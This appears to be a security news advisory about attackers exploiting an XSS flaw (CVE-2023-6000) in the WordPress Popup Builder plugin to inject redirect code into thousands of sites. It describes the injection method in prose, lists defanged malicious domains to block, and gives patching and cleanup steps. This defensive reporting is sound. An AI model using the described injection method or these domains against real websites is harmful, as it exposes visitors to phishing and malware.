An increasing number of WordPress websites are falling victim to hackers exploiting a vulnerability found in outdated versions of the Popup Builder plugin. This breach has resulted in the infection of over 3,300 websites with malicious code. The vulnerability, identified as CVE-2023-6000, is a cross-site scripting (XSS) flaw affecting Popup Builder versions 4.2.3 and older, which was first disclosed in November 2023. Despite previous efforts to address this issue, including a Balada Injector campaign earlier in the year that infected over 6,700 websites, the exploit continues to persist due to delayed patching by site administrators. Recent reports from Sucuri indicate a resurgence in attacks targeting the same vulnerability, with a notable increase in activity observed over the past three weeks. PublicWWW results confirm code injections associated with this latest campaign in 3,329 WordPress sites, with Sucuri’s scanners identifying 1,170 infections.

Attack Methodology

The attack targets the Custom JavaScript or Custom CSS sections within the WordPress admin interface, where malicious code is inserted into the ‘wp_postmeta’ database table.

The injected code serves as event handlers for various Popup Builder plugin events, including ‘sgpb-ShouldOpen’, ‘sgpb-ShouldClose’, ‘sgpb-WillOpen’, ‘sgpbDidOpen’, ‘sgpbWillClose’, and ‘sgpb-DidClose.’ This allows the malicious code to execute during specific actions of the plugin, such as when a popup opens or closes.

While the exact actions of the injected code may vary, Sucuri notes that the primary objective appears to be redirecting visitors of compromised sites to malicious destinations like phishing pages and malware distribution sites.

In some instances, analysts observed the injection of a redirect URL (e.g., hxxp://ttincoming.traveltraffic[.]cc/?traffic) as the ‘redirect-url’ parameter for a “contact-form-7” popup.

One method of injection involves retrieving a malicious code snippet from an external source and embedding it into the webpage head for execution by the browser.

This method provides attackers with a range of malicious possibilities, potentially more severe than simple redirections, allowing them to execute various harmful actions on compromised websites.

Mitigation

To mitigate the risk associated with these attacks:

1. Block Malicious Domains: Take proactive measures by blocking access to the domains “ttincoming.traveltraffic[.]cc” and “host.cloudsonicwave[.]com” from your website’s network or server.
2. Update Popup Builder Plugin: If you’re using the Popup Builder plugin on your WordPress site, promptly update it to the latest version, currently 4.2.7. This update addresses the CVE-2023-6000 vulnerability and other security issues.
3. Address Outdated Versions: Given that WordPress statistics indicate a substantial number of active sites are running Popup Builder versions 4.1 and older, ensure that you are not among them. Upgrade to the latest version to reduce the attack surface.
4. Infection Remediation: In the unfortunate event of an infection, take immediate action to remove malicious entries from the Custom JavaScript or Custom CSS sections of the Popup Builder plugin. Additionally, conduct thorough scans to uncover any hidden backdoor that may facilitate reinfection.